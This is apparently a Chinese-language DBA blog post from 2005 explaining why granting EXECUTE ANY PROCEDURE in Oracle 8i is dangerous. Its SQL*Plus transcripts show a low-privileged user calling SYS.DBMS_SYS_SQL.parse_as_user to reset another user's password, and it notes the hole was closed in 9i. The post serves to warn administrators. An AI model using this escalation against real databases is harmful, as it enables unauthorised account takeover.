暂无图片
暂无图片
1
暂无图片
暂无图片
暂无图片
首页 / Why "EXECUTE ANY PROCEDURE" is a dangerous PRIVILEGE?

Why "EXECUTE ANY PROCEDURE" is a dangerous PRIVILEGE?

原创 eygle 2005-05-10
473
TOM曾经多次说过:


All I need is "CREATE SESSION" and "EXECUTE ANY PROCEDURE" and 
I can totally do anything I want to in your database.

那么这个EXECUTE ANY PROCEDURE的危险来自哪里呢?

让我们通过一个例子来认识这个危险.

1.创建测试用户


$ sqlplus "/ as sysdba"
SQL*Plus: Release 8.1.7.0.0 - Production on Tue May 10 09:57:41 2005
(c) Copyright 2000 Oracle Corporation.  All rights reserved.
Connected to:
Oracle8i Enterprise Edition Release 8.1.7.4.0 - 64bit Production
With the Partitioning option
JServer Release 8.1.7.4.0 - 64bit Production
SQL> create user hacker identified by hacker default tablespace users temporary  
  2  tablespace temp;
User created.
SQL> grant create session to hacker;
Grant succeeded.
SQL> grant execute any procedure to hacker;
Grant succeeded.
SQL> create user loser identified by loser default tablespace users temporary
  2  tablespace temp;
User created.
SQL> grant connect to loser;
Grant succeeded.


2.使用测试用户连接

注意,此时用户hacker具有了访问和执行dbms_sys_sql包的权限。


SQL> connect hacker/hacker
Connected.
SQL> desc sys.dbms_sys_sql
PROCEDURE BIND_ARRAY
 Argument Name                  Type                    In/Out Default?
 ------------------------------ ----------------------- ------ --------
 C                              NUMBER(38)              IN
 NAME                           VARCHAR2                IN
 N_TAB                          TABLE OF NUMBER         IN
PROCEDURE BIND_ARRAY
 Argument Name                  Type                    In/Out Default?
 ------------------------------ ----------------------- ------ --------
 C                              NUMBER(38)              IN
 NAME                           VARCHAR2                IN
 C_TAB                          TABLE OF VARCHAR2(2000) IN
....
PROCEDURE VARIABLE_VALUE_ROWID
 Argument Name                  Type                    In/Out Default?
 ------------------------------ ----------------------- ------ --------
 C                              NUMBER(38)              IN
 NAME                           VARCHAR2                IN
 VALUE                          ROWID                   OUT


3.这意味着什么?


SQL> connect hacker/hacker
Connected.
SQL> DECLARE
  2     UID       NUMBER;
  3     sqltext   VARCHAR2 (100) := 'alter user loser identified by test';
  4     c         INTEGER;
  5  BEGIN
  6     c := SYS.DBMS_SYS_SQL.open_cursor ();
  7     SYS.DBMS_SYS_SQL.parse_as_user (c, sqltext, DBMS_SQL.native, 0);
  8     SYS.DBMS_SYS_SQL.close_cursor (c);
  9      END;
 10  /
  
PL/SQL procedure successfully completed.


通过DBMS_SYS_SQL.parse_as_user,hacker可以在数据库内任意为非作歹了。

用户loser的口令已被更改:


SQL> connect loser/loser
ERROR:
ORA-01017: invalid username/password; logon denied
Warning: You are no longer connected to ORACLE.
SQL> connect loser/test
Connected.
SQL>


4.注意版本

实际上这个bug只存在于Oracle8i中,从Oracle9i开始,即使拥有了execute any procedure的权限也不足以访问DBMS_SYS_SQL.
「喜欢这篇文章,您的关注和赞赏是给作者最好的鼓励」
关注作者
【版权声明】本文为墨天轮用户原创内容,转载时必须标注文章的来源(墨天轮),文章链接,文章作者等基本信息,否则作者和墨天轮有权追究责任。如果您发现墨天轮中有涉嫌抄袭或者侵权的内容,欢迎发送邮件至:contact@modb.pro进行举报,并提供相关证据,一经查实,墨天轮将立刻删除相关内容。

评论